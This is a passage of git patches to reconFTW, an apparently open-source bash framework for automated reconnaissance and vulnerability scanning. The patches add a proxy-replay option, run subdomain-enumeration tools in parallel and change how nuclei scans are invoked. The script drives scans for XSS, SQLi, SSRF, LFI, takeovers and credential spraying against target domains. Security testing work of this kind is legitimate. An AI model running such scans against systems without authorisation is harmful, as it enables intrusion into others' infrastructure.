sub_recursive(){ fi else if [ "$SUBRECURSIVE" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -561,7 +561,7 @@ function subtakeover(){ end_func "Results are saved in webs/takeover.txt" ${FUNCNAME[0]} else if [ "$SUBTAKEOVER" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -577,7 +577,7 @@ function zonetransfer(){ end_func "Results are saved in subdomains/zonetransfer.txt" ${FUNCNAME[0]} else if [ "$ZONETRANSFER" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -596,7 +596,7 @@ function s3buckets(){ end_func "Results are saved in subdomains/s3buckets.txt" ${FUNCNAME[0]} else if [ "$S3BUCKETS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -624,7 +624,7 @@ function webprobe_simple(){ end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]} else if [ "$WEBPROBESIMPLE" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -642,7 +642,7 @@ function webprobe_full(){ end_func "Results are saved in webs/webs_uncommon_ports.txt" ${FUNCNAME[0]} else if [ "$WEBPROBEFULL" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -658,7 +658,7 @@ function screenshot(){ end_func "Results are saved in screenshots folder" ${FUNCNAME[0]} else if [ "$WEBSCREENSHOT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -687,7 +687,7 @@ function favicon(){ end_func "Results are saved in hosts/favicontest.txt" ${FUNCNAME[0]} else if [ "$FAVICON" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -726,7 +726,7 @@ function portscan(){ end_func "Results are saved in hosts/portscan_[passive|active].txt" ${FUNCNAME[0]} else if [ "$PORTSCANNER" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -743,7 +743,7 @@ function cloudprovider(){ end_func "Results are saved in hosts/cloud_providers.txt" ${FUNCNAME[0]} else if [ "$CLOUD_IP" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -765,7 +765,7 @@ function waf_checks(){ end_func "Results are saved in webs/webs_wafs.txt" ${FUNCNAME[0]} else if [ "$WAF" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -800,7 +800,7 @@ function nuclei_check(){ end_func "Results are saved in nuclei_output folder" ${FUNCNAME[0]} else if [ "$NUCLEICHECK" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -822,7 +822,7 @@ function fuzz(){ end_func "Results are saved in fuzzing/*subdomain*.txt" ${FUNCNAME[0]} else if [ "$FUZZ" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -849,7 +849,7 @@ function cms_scanner(){ end_func "Results are saved in cms/*subdomain* folder" ${FUNCNAME[0]} else if [ "$CMS_SCANNER" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -881,7 +881,7 @@ function params(){ end_func "Results are saved in webs/param.txt" ${FUNCNAME[0]} else if [ "$PARAMS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -939,7 +939,7 @@ function url_gf(){ end_func "Results are saved in gf folder" ${FUNCNAME[0]} else if [ "$URL_GF" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -961,7 +961,7 @@ function url_ext(){ end_func "Results are saved in webs/urls_by_ext.txt" ${FUNCNAME[0]} else if [ "$URL_EXT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -999,7 +999,7 @@ function jschecks(){ fi else if [ "$JSCHECKS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1021,7 +1021,7 @@ function wordlist_gen(){ end_func "Results are saved in webs/dict_[words|paths].txt" ${FUNCNAME[0]} else if [ "$WORDLIST" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1049,7 +1049,7 @@ function brokenLinks(){ end_func "Results are saved in webs/brokenLinks.txt" ${FUNCNAME[0]} else if [ "$BROKENLINKS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1084,7 +1084,7 @@ function xss(){ end_func "Results are saved in vulns/xss.txt" ${FUNCNAME[0]} else if [ "$XSS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" elif [ ! -s "gf/xss.txt" ]; then printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to XSS ${reset}\n\n" else @@ -1102,7 +1102,7 @@ function cors(){ end_func "Results are saved in webs/cors.txt" ${FUNCNAME[0]} else if [ "$CORS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1132,7 +1132,7 @@ function open_redirect(){ fi else if [ "$OPEN_REDIRECT" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" elif [ ! -s "gf/redirect.txt" ]; then printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to Open Redirect ${reset}\n\n" else @@ -1179,7 +1179,7 @@ function ssrf_checks(){ fi else if [ "$SSRF_CHECKS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" elif [ ! -s "gf/ssrf.txt" ]; then printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to SSRF ${reset}\n\n" else @@ -1196,7 +1196,7 @@ function crlf_checks(){ end_func "Results are saved in vulns/crlf.txt" ${FUNCNAME[0]} else if [ "$CRLF_CHECKS" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1214,7 +1214,7 @@ function lfi(){ end_func "Results are saved in vulns/lfi.txt" ${FUNCNAME[0]} else if [ "$LFI" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" elif [ ! -s "gf/lfi.txt" ]; then printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to LFI ${reset}\n\n" else @@ -1234,7 +1234,7 @@ function ssti(){ end_func "Results are saved in vulns/ssti.txt" ${FUNCNAME[0]} else if [ "$SSTI" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" elif [ ! -s "gf/ssti.txt" ]; then printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to SSTI ${reset}\n\n" else @@ -1252,7 +1252,7 @@ function sqli(){ end_func "Results are saved in sqlmap folder" ${FUNCNAME[0]} else if [ "$SQLI" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" elif [ ! -s "gf/sqli.txt" ]; then printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to SQLi ${reset}\n\n" else @@ -1269,7 +1269,7 @@ function test_ssl(){ end_func "Results are saved in hosts/testssl.txt" ${FUNCNAME[0]} else if [ "$TEST_SSL" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1286,7 +1286,7 @@ function spraying(){ end_func "Results are saved in hosts/brutespray.txt" ${FUNCNAME[0]} else if [ "$SPRAY" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1302,7 +1302,7 @@ function 4xxbypass(){ end_func "Results are saved in vulns/4xxbypass.txt" ${FUNCNAME[0]} else if [ "$BYPASSER4XX" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi From fee2ed6912a943e82f5b7708d3a856d5a69d5f35 Mon Sep 17 00:00:00 2001 From: six2dez Date: Mon, 19 Apr 2021 09:30:03 +0200 Subject: [PATCH 09/19] Nuclei random headers && proxify feature --- reconftw.cfg | 3 ++- reconftw.sh | 59 ++++++++++++++++++++++++++++++++++------------------ 2 files changed, 41 insertions(+), 21 deletions(-) diff --git a/reconftw.cfg b/reconftw.cfg index 8fdbfada..c185541f 100644 --- a/reconftw.cfg +++ b/reconftw.cfg @@ -14,11 +14,11 @@ reset='\033[0m' # General values tools=~/Tools -NPROC=$(nproc || echo -n 1) SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" profile_shell=".$(basename $(echo $SHELL))rc" reconftw_version=$(git branch --show-current)-$(git describe --tags) update_resolvers=true +proxy_url="http://127.0.0.1:8080/" #dir_output=/custom/output/path # Golang Vars (Comment or change on your own) @@ -106,6 +106,7 @@ NOTIFICATION=false DEEP=false DIFF=false REMOVETMP=false +PROXY=false # HTTP options HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0" diff --git a/reconftw.sh b/reconftw.sh index 7703ae31..06e10dd1 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -320,26 +320,27 @@ function sub_passive(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then start_subfunc "Running : Passive Subdomain Enumeration" - eval subfinder -d $domain -o .tmp/subfinder_psub.txt $DEBUG_STD - eval assetfinder --subs-only $domain $DEBUG_ERROR | anew -q .tmp/assetfinder_psub.txt - eval amass enum -passive -d $domain -config $AMASS_CONFIG -o .tmp/amass_psub.txt $DEBUG_STD - eval findomain --quiet -t $domain -u .tmp/findomain_psub.txt $DEBUG_STD - eval crobat -s $domain $DEBUG_ERROR | anew -q .tmp/crobat_psub.txt + eval subfinder -d $domain -o .tmp/subfinder_psub.txt $DEBUG_STD & + eval assetfinder --subs-only $domain $DEBUG_ERROR | anew -q .tmp/assetfinder_psub.txt & + eval amass enum -passive -d $domain -config $AMASS_CONFIG -o .tmp/amass_psub.txt $DEBUG_STD & + eval findomain --quiet -t $domain -u .tmp/findomain_psub.txt $DEBUG_STD & + eval crobat -s $domain $DEBUG_ERROR | anew -q .tmp/crobat_psub.txt & if [ -s "${GITHUB_TOKENS}" ];then if [ "$DEEP" = true ] ; then - eval github-subdomains -d $domain -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD + eval github-subdomains -d $domain -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD & else - eval github-subdomains -d $domain -k -q -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD + eval github-subdomains -d $domain -k -q -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD & fi fi - eval curl -s "https://jldc.me/anubis/subdomains/${domain}" $DEBUG_ERROR | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d' | anew -q .tmp/jldc_psub.txt - timeout 10m waybackurls $domain | unfurl --unique domains | anew -q .tmp/waybackurls_psub.txt - timeout 10m gauplus -t $GAUPLUS_THREADS -random-agent -subs $domain | unfurl --unique domains | anew -q .tmp/gau_psub.txt + eval curl -s "https://jldc.me/anubis/subdomains/${domain}" $DEBUG_ERROR | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d' | anew -q .tmp/jldc_psub.txt & + timeout 10m waybackurls $domain | unfurl --unique domains | anew -q .tmp/waybackurls_psub.txt & + timeout 10m gauplus -t $GAUPLUS_THREADS -random-agent -subs $domain | unfurl --unique domains | anew -q .tmp/gau_psub.txt & if echo $domain | grep -q ".mil$"; then mildew mv mildew.out .tmp/mildew.out cat .tmp/mildew.out | grep ".$domain$" | anew -q .tmp/mil_psub.txt fi + wait $(jobs -rp) NUMOFLINES=$(eval cat .tmp/*_psub.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/passive_subs.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (passive)" ${FUNCNAME[0]} else @@ -553,7 +554,7 @@ function subtakeover(){ then start_func "Looking for possible subdomain takeover" touch .tmp/tko.txt - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/takeovers/ -r $resolvers_trusted -o .tmp/tko.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/takeovers/ -r $resolvers_trusted -o .tmp/tko.txt NUMOFLINES=$(eval cat .tmp/tko.txt $DEBUG_ERROR | anew webs/takeover.txt | wc -l) if [ "$NUMOFLINES" -gt 0 ]; then notification "${NUMOFLINES} new possible takeovers found" info @@ -621,7 +622,15 @@ function webprobe_simple(){ deleteOutScoped $outOfScope_file .tmp/probed_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_tmp.txt $DEBUG_ERROR | anew webs/webs.txt | wc -l) + end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]} + + if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] + then + notification "Sending websites to proxy" info + eval ffuf -mc all -w webs/webs.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD + fi + else if [ "$WEBPROBESIMPLE" = false ]; then printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" @@ -640,6 +649,11 @@ function webprobe_full(){ notification "Uncommon web ports: ${NUMOFLINES} new websites" good eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR end_func "Results are saved in webs/webs_uncommon_ports.txt" ${FUNCNAME[0]} + if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] + then + notification "Sending websites uncommon ports to proxy" info + eval ffuf -mc all -w webs/webs_uncommon_ports.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD + fi else if [ "$WEBPROBEFULL" = false ]; then printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" @@ -779,23 +793,23 @@ function nuclei_check(){ eval nuclei -update-templates $DEBUG_STD mkdir -p nuclei_output printf "${yellow}\n Running : Nuclei Technologies${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/technologies/ -r $resolvers_trusted -o nuclei_output/technologies.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/technologies/ -r $resolvers_trusted -o nuclei_output/technologies.txt printf "${yellow}\n\n Running : Nuclei Tokens${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_output/tokens.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_output/tokens.txt printf "${yellow}\n\n Running : Nuclei Exposures${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposures/ -r $resolvers_trusted -o nuclei_output/exposures.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/exposures/ -r $resolvers_trusted -o nuclei_output/exposures.txt printf "${yellow}\n\n Running : Nuclei CVEs ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/cves/ -r $resolvers_trusted -o nuclei_output/cves.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/cves/ -r $resolvers_trusted -o nuclei_output/cves.txt printf "${yellow}\n\n Running : Nuclei Default Creds ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/default-logins/ -r $resolvers_trusted -o nuclei_output/default_creds.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/default-logins/ -r $resolvers_trusted -o nuclei_output/default_creds.txt printf "${yellow}\n\n Running : Nuclei DNS ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/dns/ -r $resolvers_trusted -o nuclei_output/dns.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/dns/ -r $resolvers_trusted -o nuclei_output/dns.txt printf "${yellow}\n\n Running : Nuclei Panels ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-panels/ -r $resolvers_trusted -o nuclei_output/panels.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/exposed-panels/ -r $resolvers_trusted -o nuclei_output/panels.txt printf "${yellow}\n\n Running : Nuclei Security Misconfiguration ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/misconfiguration/ -r $resolvers_trusted -o nuclei_output/misconfigurations.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/misconfiguration/ -r $resolvers_trusted -o nuclei_output/misconfigurations.txt printf "${yellow}\n\n Running : Nuclei Vulnerabilites ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/vulnerabilities/ -r $resolvers_trusted -o nuclei_output/vulnerabilities.txt + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/vulnerabilities/ -r $resolvers_trusted -o nuclei_output/vulnerabilities.txt printf "\n\n" end_func "Results are saved in nuclei_output folder" ${FUNCNAME[0]} else @@ -917,6 +931,11 @@ function urlchecks(){ NUMOFLINES=$(eval cat .tmp/url_extract_uddup.txt $DEBUG_ERROR | anew webs/url_extract.txt | wc -l) notification "${NUMOFLINES} new urls with params" info end_func "Results are saved in webs/url_extract.txt" ${FUNCNAME[0]} + if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/url_extract.txt | wc -l) -le 1000 ]] + then + notification "Sending urls to proxy" info + eval ffuf -mc all -w webs/url_extract.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD + fi else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi From 228a049f4fa898efea216863c6870739fcab7a64 Mon Sep 17 00:00:00 2001 From: six2dez Date: Mon, 19 Apr 2021 10:48:27 +0200 Subject: [PATCH 10/19] Fix multi && nuclei --- reconftw.sh | 54 ++++++++++++++++++++++++++++------------------------- 1 file changed, 29 insertions(+), 25 deletions(-) diff --git a/reconftw.sh b/reconftw.sh index 06e10dd1..ce16cbc0 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -625,7 +625,7 @@ function webprobe_simple(){ end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]} - if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] + if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/webs.txt| wc -l) -le 1500 ]] then notification "Sending websites to proxy" info eval ffuf -mc all -w webs/webs.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD @@ -649,7 +649,7 @@ function webprobe_full(){ notification "Uncommon web ports: ${NUMOFLINES} new websites" good eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR end_func "Results are saved in webs/webs_uncommon_ports.txt" ${FUNCNAME[0]} - if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] + if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/webs_uncommon_ports.txt| wc -l) -le 1500 ]] then notification "Sending websites uncommon ports to proxy" info eval ffuf -mc all -w webs/webs_uncommon_ports.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD @@ -792,24 +792,16 @@ function nuclei_check(){ start_func "Templates based web scanner" eval nuclei -update-templates $DEBUG_STD mkdir -p nuclei_output - printf "${yellow}\n Running : Nuclei Technologies${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/technologies/ -r $resolvers_trusted -o nuclei_output/technologies.txt - printf "${yellow}\n\n Running : Nuclei Tokens${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_output/tokens.txt - printf "${yellow}\n\n Running : Nuclei Exposures${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/exposures/ -r $resolvers_trusted -o nuclei_output/exposures.txt - printf "${yellow}\n\n Running : Nuclei CVEs ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/cves/ -r $resolvers_trusted -o nuclei_output/cves.txt - printf "${yellow}\n\n Running : Nuclei Default Creds ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/default-logins/ -r $resolvers_trusted -o nuclei_output/default_creds.txt - printf "${yellow}\n\n Running : Nuclei DNS ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/dns/ -r $resolvers_trusted -o nuclei_output/dns.txt - printf "${yellow}\n\n Running : Nuclei Panels ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/exposed-panels/ -r $resolvers_trusted -o nuclei_output/panels.txt - printf "${yellow}\n\n Running : Nuclei Security Misconfiguration ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/misconfiguration/ -r $resolvers_trusted -o nuclei_output/misconfigurations.txt - printf "${yellow}\n\n Running : Nuclei Vulnerabilites ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/vulnerabilities/ -r $resolvers_trusted -o nuclei_output/vulnerabilities.txt + printf "${yellow}\n Running : Nuclei Info${reset}\n\n" + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/ -severity info -r $resolvers_trusted -o nuclei_output/info.txt + printf "${yellow}\n\n Running : Nuclei Low${reset}\n\n" + cat webs/webs.txt | nuclei -silent -t ~/nuclei-templates/ -severity low -r $resolvers_trusted -o 